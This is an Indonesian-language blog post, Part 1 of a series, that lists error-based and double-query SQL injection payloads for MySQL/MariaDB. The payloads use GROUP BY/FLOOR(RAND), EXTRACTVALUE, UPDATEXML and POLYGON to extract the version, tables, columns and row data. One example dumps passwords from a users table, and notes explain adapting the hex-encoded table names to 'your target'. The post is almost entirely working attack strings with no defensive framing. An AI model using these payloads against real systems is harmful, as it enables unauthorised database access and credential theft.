Error/Double | SQL Injection Part 1

Nelo.F4 - Error/Double SQL Injection Part 1. Seperti biasa saya luruskan kembali bahwasanya disini saya bukan ahli dalam sql injection dan bukan ahli dalam bidang hacking. saya hanya mencoba mempelajari apa yang saya tahu dan saya paham, semua payload yang saya berikan dibawah saya dapat dari hackbar mod by pesantren cyber army. ada 2 part dalam Error/Double payload ini. payload ini guananya untuk apa? untuk inject mysql mariaDB! ada juga server yang lain tetapi sangat di sayangkan saya belum pernah mencoba ke server yang lain.

The contents of all of these articles

Error Based
XPATH EXTRACTVALUE
XPATH UPDATEXML
POLYGON / MULTIPIONT

Error Based

Get Version

+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1

Get Database

+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

Get Tables

+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

Get Column

+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x5448495320495320594f555220434f4c554d4e53+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
NOTE: 0x5448495320495320594f555220434f4c554d4e53 (change this for your column and change again to hex)

Get Data

+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(COLUMN NAME)+AS+CHAR),0x7e))+FROM+TABLE NAME+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Example: +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(password)+AS+CHAR),0x7e))+FROM+users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)

XPATH EXTRACTVALUE

Get Version

and extractvalue(0x0a,concat(0x0a,(select version())))

Get Tables

and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))

Get Column

and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x7461626c655f6e616d65 limit 0,1)))
NOTE: Change 0x7461626c655f6e616d65 this hex, to tables name your target and change to be hex again.

Get Data

and extractvalue(0x0a,concat(0x0a,(select concat(username,password) from Table Name limit 0,1)))
NOTE: Change Table Name this name table to your target table name, and user,password to your target column

XPATH UPDATEXML

Get Version

and updatexml(null,concat(0x0a,(select version())),null)

Get Tables

and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)

Get Column

and updatexml(null,concat(0x0a,(select column_name from information_schema.columns where table_schema=DATABASE() and table_name=0x596f7572205461626c65204e616d65 limit 0,1)),null)
NOTE: Change 0x596f7572205461626c65204e616d65 this hex, to tables name your target and change to be hex again.

Get Data

and updatexml(null,concat(0x0a,(select concat(yourcolumn,column) from yourtable limit 0,1)),null)
NOTE: Change this yourcolumn,column and change this again yourtable

POLYGON / MULTIPIONT

Get Version

+POLYGON((Select*from(Select*from(Select+@@version ``)y)x))

Get Tables

+POLYGON((select*from(select*from(select+group_concat(table_name+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database())f)x))

okay until here, next update part 2

See u to part 2 - Nelo.F4